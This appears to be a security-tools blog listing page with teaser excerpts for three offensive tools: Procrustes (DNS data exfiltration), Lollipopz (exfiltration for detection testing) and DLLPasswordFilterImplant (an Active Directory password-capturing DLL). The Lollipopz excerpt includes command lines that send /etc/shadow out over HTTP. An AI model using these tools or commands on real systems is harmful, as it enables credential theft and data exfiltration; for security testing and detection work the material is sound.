Kali
Procrustes is a bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked. The script currently supports sh, bash and powershell and is compatible with exec style command execution (e.g. java.lang.Runtime.exec). Unstaged: Staged: For its operations, …
Continue reading “Procrustes : Script To Automates The Exfiltration Of Data Over DNS”
Lollipopz is a data exfiltration utility for testing detection capabilities. Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To? /etc/shadow -> HTTP GET requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r /etc/shadow …
Continue reading “Lollipopz : Data Exfiltration Utility For Testing Detection Capabilities”
DLLPasswordFilterImplant is a custom password filter DLL that allows the capture of a user’s credentials. Each password change event on a domain will trigger the registered DLL in order to exfiltrate the username and new password value prior successfully changing it in the Active Directory (AD). For more information about password filters consult the Microsoft …
